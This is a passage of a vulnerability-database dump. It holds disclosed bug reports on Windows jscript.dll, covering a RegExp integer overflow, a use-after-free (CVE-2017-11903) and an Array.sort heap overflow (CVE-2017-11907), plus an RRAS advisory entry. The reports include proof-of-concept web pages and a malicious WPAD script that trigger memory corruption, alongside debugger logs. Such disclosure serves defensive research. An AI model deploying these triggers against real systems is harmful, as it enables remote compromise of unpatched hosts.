Extending the buffer is handled using RegExpBase::EnsureSpace which looks (approximately) like:\r\n\r\nvoid RegExpBase::EnsureSpace(int desired_size) {\r\n if(desired_size > buffer_size) {\r\n if(2 * desired_size < desired_size) {\r\n //throw an exception\r\n }\r\n int new_size = 2 * desired_size;\r\n char * new_buffer = realloc(buffer, new_size);\r\n if(!new_buffer) {\r\n //throw an exception \r\n }\r\n buffer = new_buffer;\r\n buffer_size = new_size;\r\n }\r\n}\r\n\r\nNote that desired_size is a signed 32-bit integer. RegExpBase::EnsureSpace has an integer overflow check, however if an overflow happens in the caller (a caller must add the size which it wants to append to the existing content size) and desired_size becomes negative, RegExpBase::EnsureSpace would simply return because of the first if() statement without attempting to extend the buffer.\r\n\r\nIndeed, integer overflows can happen in the several callers of RegExpBase::EnsureSpace. The one being triggered in the PoC is in RegExpComp::Compile, when it attempts to append the raw input string to the buffer towards the end of the compilation process.\r\n\r\nDebug log (from IE, but it looks similar in the WPAD service):\r\n\r\n============================================\r\n\r\n(b90.698): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\nmsvcrt!memcpy+0x1d9:\r\n000007fe`fefe123d 668901 mov word ptr [rcx],ax ds:00000002`5bb60fe0=????\r\n\r\n0:012> r\r\nrax=0000000040000061 rbx=00000000042b7ea0 rcx=000000025bb60fe0\r\nrdx=fffffffdfa4b0010 rsi=00000000042b5f48 rdi=000000004000000a\r\nrip=000007fefefe123d rsp=0000000012399ef8 rbp=0000000012399f28\r\n r8=0000000040000008 r9=0000000000000000 
r10=6100610061006100\r\nr11=000000021bb60fd8 r12=0000000016010fe8 r13=000007feebc91670\r\nr14=0000000020000001 r15=0000000000000000\r\niopl=0 nv up ei pl nz na pe nc\r\ncs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202\r\nmsvcrt!memcpy+0x1d9:\r\n000007fe`fefe123d 668901 mov word ptr [rcx],ax ds:00000002`5bb60fe0=????\r\n\r\n0:012> k\r\n # Child-SP RetAddr Call Site\r\n00 00000000`12399ef8 000007fe`ebc88bb3 msvcrt!memcpy+0x1d9\r\n01 00000000`12399f00 000007fe`ebcfacc2 jscript!RegExpComp::Compile+0x1b7\r\n02 00000000`12399f60 000007fe`ebce2118 jscript!RegExpComp::CompileDynamic+0x62\r\n03 00000000`12399fa0 000007fe`ebce3310 jscript!RegExpObj::Compile+0x32c\r\n04 00000000`1239a0f0 000007fe`ebc7c2ec jscript!JsRegExpCompile+0x70\r\n05 00000000`1239a140 000007fe`ebc7a9fe jscript!NatFncObj::Call+0x138\r\n06 00000000`1239a1f0 000007fe`ebc7b234 jscript!NameTbl::InvokeInternal+0x3f8\r\n07 00000000`1239a310 000007fe`ebc79852 jscript!VAR::InvokeByName+0x81c\r\n08 00000000`1239a520 000007fe`ebc79929 jscript!VAR::InvokeDispName+0x72\r\n09 00000000`1239a5a0 000007fe`ebc724b8 jscript!VAR::InvokeByDispID+0x1229\r\n0a 00000000`1239a5f0 000007fe`ebc78ec2 jscript!CScriptRuntime::Run+0x5a6\r\n0b 00000000`1239b3f0 000007fe`ebc78d2b jscript!ScrFncObj::CallWithFrameOnStack+0x162\r\n0c 00000000`1239b600 000007fe`ebc78b95 jscript!ScrFncObj::Call+0xb7\r\n0d 00000000`1239b6a0 000007fe`ebc7e6c0 jscript!CSession::Execute+0x19e\r\n0e 00000000`1239b770 000007fe`ebc870e7 jscript!COleScript::ExecutePendingScripts+0x17a\r\n0f 00000000`1239b840 000007fe`ebc868d6 
jscript!COleScript::ParseScriptTextCore+0x267\r\n10 00000000`1239b930 000007fe`ecdf5251 jscript!COleScript::ParseScriptText+0x56\r\n11 00000000`1239b990 000007fe`ed57b320 MSHTML!CActiveScriptHolder::ParseScriptText+0xc1\r\n12 00000000`1239ba10 000007fe`ecdf6256 MSHTML!CScriptCollection::ParseScriptText+0x37f\r\n13 00000000`1239baf0 000007fe`ecdf5c8e MSHTML!CScriptData::CommitCode+0x3d9\r\n14 00000000`1239bcc0 000007fe`ecdf5a11 MSHTML!CScriptData::Execute+0x283\r\n15 00000000`1239bd80 000007fe`ed5b46fb MSHTML!CHtmScriptParseCtx::Execute+0x101\r\n16 00000000`1239bdc0 000007fe`ece98a5b MSHTML!CHtmParseBase::Execute+0x235\r\n17 00000000`1239be60 000007fe`ecd72e39 MSHTML!CHtmPost::Broadcast+0x90\r\n18 00000000`1239bea0 000007fe`ecdccaef MSHTML!CHtmPost::Exec+0x4bb\r\n19 00000000`1239c0b0 000007fe`ecdcca40 MSHTML!CHtmPost::Run+0x3f\r\n1a 00000000`1239c0e0 000007fe`ecdcda12 MSHTML!PostManExecute+0x70\r\n1b 00000000`1239c160 000007fe`ecdd0843 MSHTML!PostManResume+0xa1\r\n1c 00000000`1239c1a0 000007fe`ecdb6fc7 MSHTML!CHtmPost::OnDwnChanCallback+0x43\r\n1d 00000000`1239c1f0 000007fe`ed5e4f78 MSHTML!CDwnChan::OnMethodCall+0x41\r\n1e 00000000`1239c220 000007fe`eccd9d75 MSHTML!GlobalWndOnMethodCall+0x240\r\n1f 00000000`1239c2c0 00000000`77229bbd MSHTML!GlobalWndProc+0x150\r\n20 00000000`1239c340 00000000`772298c2 USER32!UserCallWinProcCheckWow+0x1ad\r\n21 00000000`1239c400 000007fe`f29d4a87 USER32!DispatchMessageWorker+0x3b5\r\n22 00000000`1239c480 000007fe`f29dbabb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555\r\n23 00000000`1239f700 000007fe`fd73572f IEFRAME!LCIETab_ThreadProc+0x3a3\r\n24 00000000`1239f830 000007fe`ee62925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f\r\n25 00000000`1239f860 00000000`773259cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f\r\n26 00000000`1239f8b0 00000000`7745a561 kernel32!BaseThreadInitThunk+0xd\r\n27 00000000`1239f8e0 00000000`00000000 
ntdll!RtlUserThreadStart+0x1d\r\n\r\n============================================\r\n\r\n\r\nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse\r\nor a patch has been made broadly available, the bug report will become\r\nvisible to the public.\r\n\r\n\r\n\r\n\r\nFound by: ifratric\n\n# 0day.today [2018-03-01] #", "sourceHref": "https://0day.today/exploit/29263", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-13T14:07:17", "description": "Exploit for windows platform in category dos / poc", "cvss3": {}, "published": "2017-12-19T00:00:00", "type": "zdt", "title": "Microsoft Windows jscript!NameTbl::GetValDef Use-After-Free Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11903"], "modified": "2017-12-19T00:00:00", "id": "1337DAY-ID-29264", "href": "https://0day.today/exploit/description/29264", "sourceData": "Windows: use-after-free in jscript!NameTbl::GetValDef \r\n\r\nCVE-2017-11903\r\n\r\n\r\nThere is a use-after-free vulnerability in jscript.dll. This issue could potentially be exploited through multiple vectors:\r\n\r\n - An attacker on the local network could exploit this issue by posing as a WPAD (Web Proxy Auto-Discovery) host and sending a malicious wpad.dat file to the victim. This works because wpad.dat files are JavaScript files interpreted with jscript.dll on the WPAD client. 
Note that, in this case, an attacker who successfully exploited the vulnerability would gain the same privileges as the WinHTTP Web Proxy Auto-Discovery Service.\r\n\r\n - The issue can also be exploited by opening a malicious web page in Internet Explorer.\r\n\r\nThe issue has been verified on 64-bit Win7 with the most recent patches applied.\r\n\r\nPoC for Internet Explorer (might require page heap to trigger the crash):\r\n\r\n============================================\r\n\r\n<!-- saved from url=(0014)about:internet -->\r\n<meta http-equiv=\"X-UA-Compatible\" content=\"IE=8\"></meta>\r\n<script language=\"Jscript.Encode\">\r\n\r\nvar vars = new Array(100);\r\nfor(var i=0;i<100;i++) vars[i] = {};\r\n\r\nfunction f() {\r\n vars[1] = 1;\r\n CollectGarbage();\r\n return {};\r\n}\r\n\r\nvars[1].toString = f;\r\nArray.prototype.join.call(vars);\r\n\r\n</script>\r\n\r\n============================================\r\n\r\nPoC for WPAD (might require page heap to trigger the crash):\r\n\r\n============================================\r\n\r\nfunction FindProxyForURL(url, host) {\r\n\r\nvar vars = new Array(100);\r\nfor(var i=0;i<100;i++) vars[i] = {};\r\n\r\nfunction f() {\r\n vars[1] = 1;\r\n CollectGarbage();\r\n return {};\r\n}\r\n\r\nvars[1].toString = f;\r\nArray.prototype.join.call(vars);\r\n\r\nreturn \"DIRECT\";\r\n}\r\n\r\n===========================================\r\n\r\nTechnical details:\r\n\r\nThe issue is in NameTbl::GetValDef which is called when an object is converted to a string. The function attempts to call toString() or valueOf() of the NameTbl object 2 times or until the return value isn't an JavaScript object. The issue is that the NameTbl object on which these methods are called isn't explicitly tracked by the garbage collector, which means the object can be deleted inside the toString/valueOf callback (as long as it's not tracked by the garbage collector somewhere else). 
Basically, toString/valueOf can delete its 'this' object.\r\n\r\nNote that the crash location in the Debug log immediately precedes a virtual method call.\r\n\r\nDebug log (from IE, but it looks similar in the WPAD service):\r\n\r\n============================================\r\n\r\n(a68.e4c): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\njscript!NameTbl::GetValDef+0x58:\r\n000007fe`f5dea398 498b06 mov rax,qword ptr [r14] ds:00000000`044d9f90=????????????????\r\n\r\n0:013> r\r\nrax=0000000000000001 rbx=000007fef5d7bd50 rcx=00000000044acfa0\r\nrdx=0000000000000000 rsi=0000000012b49fb8 rdi=0000000000000001\r\nrip=000007fef5dea398 rsp=0000000012b49ae0 rbp=0000000000000000\r\n r8=0000000004309f20 r9=0000000004309670 r10=0000000000000081\r\nr11=0000000012b49a60 r12=0000000000000080 r13=0000000000000008\r\nr14=00000000044d9f90 r15=0000000000000000\r\niopl=0 nv up ei ng nz ac po cy\r\ncs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010297\r\njscript!NameTbl::GetValDef+0x58:\r\n000007fe`f5dea398 498b06 mov rax,qword ptr [r14] ds:00000000`044d9f90=????????????????\r\n\r\n0:013> k\r\n # Child-SP RetAddr 
Call Site\r\n00 00000000`12b49ae0 000007fe`f5dad069 jscript!NameTbl::GetValDef+0x58\r\n01 00000000`12b49b70 000007fe`f5d7de69 jscript!NameTbl::InvokeInternal+0xb07\r\n02 00000000`12b49c90 000007fe`f5d7bf3b jscript!VAR::GetValue+0xa1\r\n03 00000000`12b49ce0 000007fe`f5ddb65d jscript!ConvertToString+0x5b\r\n04 00000000`12b49f60 000007fe`f5d7c2ec jscript!JsArrayJoin+0x38d\r\n05 00000000`12b4a060 000007fe`f5d7a9fe jscript!NatFncObj::Call+0x138\r\n06 00000000`12b4a110 000007fe`f5d786ea jscript!NameTbl::InvokeInternal+0x3f8\r\n07 00000000`12b4a230 000007fe`f5dcdd72 jscript!VAR::InvokeByDispID+0xffffffff`ffffffea\r\n08 00000000`12b4a280 000007fe`f5d7c2ec jscript!JsFncCall+0xc2\r\n09 00000000`12b4a310 000007fe`f5d7a9fe jscript!NatFncObj::Call+0x138\r\n0a 00000000`12b4a3c0 000007fe`f5d7b234 jscript!NameTbl::InvokeInternal+0x3f8\r\n0b 00000000`12b4a4e0 000007fe`f5d79852 jscript!VAR::InvokeByName+0x81c\r\n0c 00000000`12b4a6f0 000007fe`f5d79929 jscript!VAR::InvokeDispName+0x72\r\n0d 00000000`12b4a770 000007fe`f5d724b8 jscript!VAR::InvokeByDispID+0x1229\r\n0e 00000000`12b4a7c0 000007fe`f5d78ec2 jscript!CScriptRuntime::Run+0x5a6\r\n0f 00000000`12b4b5c0 000007fe`f5d78d2b jscript!ScrFncObj::CallWithFrameOnStack+0x162\r\n10 00000000`12b4b7d0 000007fe`f5d78b95 jscript!ScrFncObj::Call+0xb7\r\n11 00000000`12b4b870 000007fe`f5d7e6c0 jscript!CSession::Execute+0x19e\r\n12 00000000`12b4b940 000007fe`f5d870e7 jscript!COleScript::ExecutePendingScripts+0x17a\r\n13 00000000`12b4ba10 000007fe`f5d868d6 jscript!COleScript::ParseScriptTextCore+0x267\r\n14 00000000`12b4bb00 000007fe`ead55251 jscript!COleScript::ParseScriptText+0x56\r\n15 00000000`12b4bb60 000007fe`eb4db320 MSHTML!CActiveScriptHolder::ParseScriptText+0xc1\r\n16 00000000`12b4bbe0 000007fe`ead56256 MSHTML!CScriptCollection::ParseScriptText+0x37f\r\n17 00000000`12b4bcc0 000007fe`ead55c8e MSHTML!CScriptData::CommitCode+0x3d9\r\n18 00000000`12b4be90 000007fe`ead55a11 MSHTML!CScriptData::Execute+0x283\r\n19 00000000`12b4bf50 
000007fe`eb5146fb MSHTML!CHtmScriptParseCtx::Execute+0x101\r\n1a 00000000`12b4bf90 000007fe`eadf8a5b MSHTML!CHtmParseBase::Execute+0x235\r\n1b 00000000`12b4c030 000007fe`eacd2e39 MSHTML!CHtmPost::Broadcast+0x90\r\n1c 00000000`12b4c070 000007fe`ead2caef MSHTML!CHtmPost::Exec+0x4bb\r\n1d 00000000`12b4c280 000007fe`ead2ca40 MSHTML!CHtmPost::Run+0x3f\r\n1e 00000000`12b4c2b0 000007fe`ead2da12 MSHTML!PostManExecute+0x70\r\n1f 00000000`12b4c330 000007fe`ead30843 MSHTML!PostManResume+0xa1\r\n20 00000000`12b4c370 000007fe`ead16fc7 MSHTML!CHtmPost::OnDwnChanCallback+0x43\r\n21 00000000`12b4c3c0 000007fe`eb544f78 MSHTML!CDwnChan::OnMethodCall+0x41\r\n22 00000000`12b4c3f0 000007fe`eac39d75 MSHTML!GlobalWndOnMethodCall+0x240\r\n23 00000000`12b4c490 00000000`77709bbd MSHTML!GlobalWndProc+0x150\r\n24 00000000`12b4c510 00000000`777098c2 USER32!UserCallWinProcCheckWow+0x1ad\r\n25 00000000`12b4c5d0 000007fe`f2be4a87 USER32!DispatchMessageWorker+0x3b5\r\n26 00000000`12b4c650 000007fe`f2bebabb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555\r\n27 00000000`12b4f8d0 000007fe`fe88572f IEFRAME!LCIETab_ThreadProc+0x3a3\r\n28 00000000`12b4fa00 000007fe`f5ff925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f\r\n29 00000000`12b4fa30 00000000`775e59cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f\r\n2a 00000000`12b4fa80 00000000`7781a561 kernel32!BaseThreadInitThunk+0xd\r\n2b 00000000`12b4fab0 00000000`00000000 ntdll!RtlUserThreadStart+0x1d\r\n\r\n0:013> !heap -p -a 00000000`044d9f90\r\n address 00000000044d9f90 found in\r\n _DPH_HEAP_ROOT @ 3fd1000\r\n in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)\r\n 3fe0680: 44d9000 2000\r\n 000007fef5f78726 verifier!AVrfDebugPageHeapFree+0x00000000000000a2\r\n 00000000778b4255 ntdll!RtlDebugFreeHeap+0x0000000000000035\r\n 000000007785797c ntdll! ?? 
::FNODOBFM::`string'+0x000000000000e982\r\n 000007feff2110c8 msvcrt!free+0x000000000000001c\r\n 000007fef5d7bad2 jscript!NativeErrorProtoObj<16>::`vector deleting destructor'+0x0000000000000022\r\n 000007fef5d7b938 jscript!NameTbl::SetMasterVariant+0x000000000000a240\r\n 000007fef5d942cb jscript!GcAlloc::ReclaimGarbage+0x000000000000034d\r\n 000007fef5d719e2 jscript!GcContext::Reclaim+0x00000000000000ae\r\n 000007fef5d81956 jscript!GcContext::CollectCore+0x000000000000018b\r\n 000007fef5d817a5 jscript!GcContext::Collect+0x0000000000000025\r\n 000007fef5dc42f3 jscript!JsCollectGarbage+0x0000000000000023\r\n 000007fef5d7c2ec jscript!NatFncObj::Call+0x0000000000000138\r\n 000007fef5d7c199 jscript!NameTbl::InvokeInternal+0x0000000000000377\r\n 000007fef5d786ea jscript!VAR::InvokeByDispID+0xffffffffffffffea\r\n 000007fef5d724b8 jscript!CScriptRuntime::Run+0x00000000000005a6\r\n 000007fef5d78ec2 jscript!ScrFncObj::CallWithFrameOnStack+0x0000000000000162\r\n 000007fef5d78d2b jscript!ScrFncObj::Call+0x00000000000000b7\r\n 000007fef5da2084 jscript!NameTbl::InvokeInternal+0x000000000000060f\r\n 000007fef5d786ea jscript!VAR::InvokeByDispID+0xffffffffffffffea\r\n 000007fef5dea422 jscript!NameTbl::GetValDef+0x00000000000000e2\r\n 000007fef5dad069 jscript!NameTbl::InvokeInternal+0x0000000000000b07\r\n 000007fef5d7de69 jscript!VAR::GetValue+0x00000000000000a1\r\n 000007fef5d7bf3b jscript!ConvertToString+0x000000000000005b\r\n 000007fef5ddb65d jscript!JsArrayJoin+0x000000000000038d\r\n 000007fef5d7c2ec jscript!NatFncObj::Call+0x0000000000000138\r\n 000007fef5d7a9fe jscript!NameTbl::InvokeInternal+0x00000000000003f8\r\n 000007fef5d786ea jscript!VAR::InvokeByDispID+0xffffffffffffffea\r\n 000007fef5dcdd72 jscript!JsFncCall+0x00000000000000c2\r\n 000007fef5d7c2ec jscript!NatFncObj::Call+0x0000000000000138\r\n 000007fef5d7a9fe jscript!NameTbl::InvokeInternal+0x00000000000003f8\r\n 000007fef5d7b234 jscript!VAR::InvokeByName+0x000000000000081c\r\n 000007fef5d79852 
jscript!VAR::InvokeDispName+0x0000000000000072\r\n\r\n0:013> u rip\r\njscript!NameTbl::GetValDef+0x58:\r\n000007fe`f5dea398 498b06 mov rax,qword ptr [r14]\r\n000007fe`f5dea39b 488b98e0000000 mov rbx,qword ptr [rax+0E0h]\r\n000007fe`f5dea3a2 488bcb mov rcx,rbx\r\n000007fe`f5dea3a5 ff15b5320400 call qword ptr [jscript!_guard_check_icall_fptr (000007fe`f5e2d660)]\r\n000007fe`f5dea3ab 488b54fc40 mov rdx,qword ptr [rsp+rdi*8+40h]\r\n000007fe`f5dea3b0 4c8d442450 lea r8,[rsp+50h]\r\n000007fe`f5dea3b5 498bce mov rcx,r14\r\n000007fe`f5dea3b8 ffd3 call rbx\r\n\r\n============================================\r\n\r\n\r\nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse\r\nor a patch has been made broadly available, the bug report will become\r\nvisible to the public.\r\n\r\n\r\n\r\n\r\nFound by: ifratric\n\n# 0day.today [2018-03-13] #", "sourceHref": "https://0day.today/exploit/29264", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-03T13:11:47", "description": "There is a heap overflow vulnerability in the jscript.dll library (used in IE, WPAD and other places). 
The bug affects 2 functions, JsArrayStringHeapSort and JsArrayFunctionHeapSort.", "cvss3": {}, "published": "2017-12-19T00:00:00", "type": "zdt", "title": "Microsoft Windows Array.sort jscript.dll Heap Overflow Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11907"], "modified": "2017-12-19T00:00:00", "id": "1337DAY-ID-29261", "href": "https://0day.today/exploit/description/29261", "sourceData": "Windows: heap overflow in jscript.dll in Array.sort \r\n\r\nCVE-2017-11907\r\n\r\n\r\nThere is a heap overflow vulnerability in the jscript.dll library (used in IE, WPAD and other places). The bug affects 2 functions, JsArrayStringHeapSort and JsArrayFunctionHeapSort.\r\n\r\nPoC for IE (note: page heap might be required to observe the crash):\r\n\r\n=========================================\r\n\r\n<!-- saved from url=(0014)about:internet -->\r\n<meta http-equiv=\"X-UA-Compatible\" content=\"IE=8\"></meta>\r\n<script language=\"Jscript.Encode\">\r\nvar vars = new Array(100);\r\n\r\nvar arr = new Array(1000);\r\nfor(var i=1;i<600;i++) arr[i] = i;\r\n\r\nvar o = {toString:function() {\r\n for(var i=600;i<1000;i++) {\r\n arr[i] = 1337;\r\n }\r\n}}\r\n\r\nfunction go() {\r\n arr[0] = o;\r\n Array.prototype.sort.call(arr);\r\n}\r\n\r\n\r\ngo();\r\n\r\n</script>\r\n\r\n=========================================\r\n\r\nTechnical details:\r\n\r\nArray.sort is implemented in JsArraySort which, depending on whether a comparison function was specified or not, calls JsArrayStringHeapSort or JsArrayFunctionHeapSort. These (vulnerable) functions take several arguments, 2 of which are the input array length and the number of elements currently in the input array (this can be smaller than the array length). The vulnerable functions are going to allocate 2 buffers to store intermediate data. The size of these buffers will be calculated based on *num_elements*. 
However, while filling those arrays it is possible that the number of elements is going to increase, which causes a heap overflow.\r\n\r\nDebug log:\r\n\r\n=========================================\r\n\r\n0:023> g\r\n(e5c.988): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\njscript!NameTbl::GetValCore+0x30:\r\n000007fe`f4f59df0 498900 mov qword ptr [r8],rax ds:00000000`04603010=????????????????\r\n\r\n0:013> r\r\nrax=c0c0c0c0c0c00003 rbx=000000000443cf20 rcx=000000000441df90\r\nrdx=0000000000000003 rsi=0000000004603010 rdi=000000000441df90\r\nrip=000007fef4f59df0 rsp=00000000129a8e10 rbp=0000000000000000\r\n r8=0000000004603010 r9=000000000441fdc8 r10=00000000040a9800\r\nr11=00000000129a8e70 r12=0000000003ecb690 r13=0000000000000001\r\nr14=0000000004603010 r15=0000000000000259\r\niopl=0 nv up ei ng nz na pe cy\r\ncs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010283\r\njscript!NameTbl::GetValCore+0x30:\r\n000007fe`f4f59df0 498900 mov qword ptr [r8],rax ds:00000000`04603010=????????????????\r\n\r\n0:013> k\r\n # Child-SP RetAddr Call Site\r\n00 00000000`129a8e10 000007fe`f4f75f0e 
jscript!NameTbl::GetValCore+0x30\r\n01 00000000`129a8e70 000007fe`f4f761d8 jscript!ArrayObj::GetValAtIndex+0x62\r\n02 00000000`129a8eb0 000007fe`f4fbd5a2 jscript!ArrayObj::GetVal+0x28\r\n03 00000000`129a8f40 000007fe`f4fbcd90 jscript!JsArrayStringHeapSort+0x1a6\r\n04 00000000`129a90d0 000007fe`f4f5c2ec jscript!JsArraySort+0x270\r\n05 00000000`129a9180 000007fe`f4f5a9fe jscript!NatFncObj::Call+0x138\r\n06 00000000`129a9230 000007fe`f4f586ea jscript!NameTbl::InvokeInternal+0x3f8\r\n07 00000000`129a9350 000007fe`f4fadd72 jscript!VAR::InvokeByDispID+0xffffffff`ffffffea\r\n08 00000000`129a93a0 000007fe`f4f5c2ec jscript!JsFncCall+0xc2\r\n09 00000000`129a9430 000007fe`f4f5a9fe jscript!NatFncObj::Call+0x138\r\n0a 00000000`129a94e0 000007fe`f4f5b234 jscript!NameTbl::InvokeInternal+0x3f8\r\n0b 00000000`129a9600 000007fe`f4f59852 jscript!VAR::InvokeByName+0x81c\r\n0c 00000000`129a9810 000007fe`f4f59929 jscript!VAR::InvokeDispName+0x72\r\n0d 00000000`129a9890 000007fe`f4f524b8 jscript!VAR::InvokeByDispID+0x1229\r\n0e 00000000`129a98e0 000007fe`f4f58ec2 jscript!CScriptRuntime::Run+0x5a6\r\n0f 00000000`129aa6e0 000007fe`f4f594b3 jscript!ScrFncObj::CallWithFrameOnStack+0x162\r\n10 00000000`129aa8f0 000007fe`f4f586ea jscript!NameTbl::InvokeInternal+0x2d3\r\n11 00000000`129aaa10 000007fe`f4f524b8 jscript!VAR::InvokeByDispID+0xffffffff`ffffffea\r\n12 00000000`129aaa60 000007fe`f4f58ec2 jscript!CScriptRuntime::Run+0x5a6\r\n13 00000000`129ab860 000007fe`f4f58d2b jscript!ScrFncObj::CallWithFrameOnStack+0x162\r\n14 00000000`129aba70 000007fe`f4f58b95 jscript!ScrFncObj::Call+0xb7\r\n15 00000000`129abb10 000007fe`f4f5e6c0 jscript!CSession::Execute+0x19e\r\n16 00000000`129abbe0 000007fe`f4f670e7 jscript!COleScript::ExecutePendingScripts+0x17a\r\n17 00000000`129abcb0 000007fe`f4f668d6 jscript!COleScript::ParseScriptTextCore+0x267\r\n18 00000000`129abda0 000007fe`ec595251 jscript!COleScript::ParseScriptText+0x56\r\n19 00000000`129abe00 000007fe`ecd1b320 
MSHTML!CActiveScriptHolder::ParseScriptText+0xc1\r\n1a 00000000`129abe80 000007fe`ec596256 MSHTML!CScriptCollection::ParseScriptText+0x37f\r\n1b 00000000`129abf60 000007fe`ec595c8e MSHTML!CScriptData::CommitCode+0x3d9\r\n1c 00000000`129ac130 000007fe`ec595a11 MSHTML!CScriptData::Execute+0x283\r\n1d 00000000`129ac1f0 000007fe`ecd546fb MSHTML!CHtmScriptParseCtx::Execute+0x101\r\n1e 00000000`129ac230 000007fe`ec638a5b MSHTML!CHtmParseBase::Execute+0x235\r\n1f 00000000`129ac2d0 000007fe`ec512e39 MSHTML!CHtmPost::Broadcast+0x90\r\n20 00000000`129ac310 000007fe`ec56caef MSHTML!CHtmPost::Exec+0x4bb\r\n21 00000000`129ac520 000007fe`ec56ca40 MSHTML!CHtmPost::Run+0x3f\r\n22 00000000`129ac550 000007fe`ec56da12 MSHTML!PostManExecute+0x70\r\n23 00000000`129ac5d0 000007fe`ec570843 MSHTML!PostManResume+0xa1\r\n24 00000000`129ac610 000007fe`ec556fc7 MSHTML!CHtmPost::OnDwnChanCallback+0x43\r\n25 00000000`129ac660 000007fe`ecd84f78 MSHTML!CDwnChan::OnMethodCall+0x41\r\n26 00000000`129ac690 000007fe`ec479d75 MSHTML!GlobalWndOnMethodCall+0x240\r\n27 00000000`129ac730 00000000`76d19bbd MSHTML!GlobalWndProc+0x150\r\n28 00000000`129ac7b0 00000000`76d198c2 USER32!UserCallWinProcCheckWow+0x1ad\r\n29 00000000`129ac870 000007fe`f11a4a87 USER32!DispatchMessageWorker+0x3b5\r\n2a 00000000`129ac8f0 000007fe`f11ababb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555\r\n2b 00000000`129afb70 000007fe`fd48572f IEFRAME!LCIETab_ThreadProc+0x3a3\r\n2c 00000000`129afca0 000007fe`f521925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f\r\n2d 00000000`129afcd0 00000000`76e159cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f\r\n2e 00000000`129afd20 00000000`76f4a561 kernel32!BaseThreadInitThunk+0xd\r\n2f 00000000`129afd50 00000000`00000000 ntdll!RtlUserThreadStart+0x1d\r\n\r\n=========================================\r\n\r\n\r\nThis bug is subject to a 90 day disclosure deadline. 
After 90 days elapse\r\nor a patch has been made broadly available, the bug report will become\r\nvisible to the public.\r\n\r\n\r\n\r\n\r\nFound by: ifratric\n\n# 0day.today [2018-01-03] #", "sourceHref": "https://0day.today/exploit/29261", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "saint": [{"lastseen": "2021-07-29T16:40:26", "description": "Added: 06/06/2018 \nBID: [102055](<http://www.securityfocus.com/bid/102055>) \n\n\n### Background\n\nRouting Remote Access Service (RRAS) is a Microsoft API that can be used to create client applications. These applications display RAS common dialog boxes, manage remote access connections and devices, and manipulate phone-book entries. These APIs make it possible to create applications to administer the routing capabilities of the operating system. Additionally, developers can use the Routing Protocol APIs to implement routing protocols. \n\n### Problem\n\nWindows 7 SP1, Windows 8.1 and RT 8.1, Windows Server 2008 SP2 and R2 SP1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703 and 1709, Windows Server 2016 and Windows Server, version 1709 allow a remote code execution vulnerability due to the way the Routing and Remote Access service handles requests, aka \"Windows RRAS Service Remote Code Execution Vulnerability\". \n\n### Resolution\n\nConsider disabling the RRAS service if you are still using Windows Server 2003, or apply a patch once Microsoft has issued one to fix it. 
\n\n### References\n\n[https://www.exploit-db.com/exploits/44616/](<https://www.exploit-db.com/exploits/44616/>) \n[https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11885](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11885>) \n[http://www.securityfocus.com/bid/102055](<http://www.securityfocus.com/bid/102055>) \n[http://www.securitytracker.com/id/1039987](<http://www.securitytracker.com/id/1039987>) \n\n\n### Limitations\n\nThis exploit has been tested on Windows Server 2003 SP2 (ES). \n\nIt is effective only when the RRAS service is enabled. \n\n### Platforms\n\nWindows Server 2003 \n \n\n", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 6.6, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-06T00:00:00", "type": "saint", "title": "Windows RRAS Service Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11885"], "modified": "2018-06-06T00:00:00", "id": "SAINT:E09A7B11198664E783694CD57E5F0D4C", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/windows_smb_rras", "cvss": {"score": 8.5, 
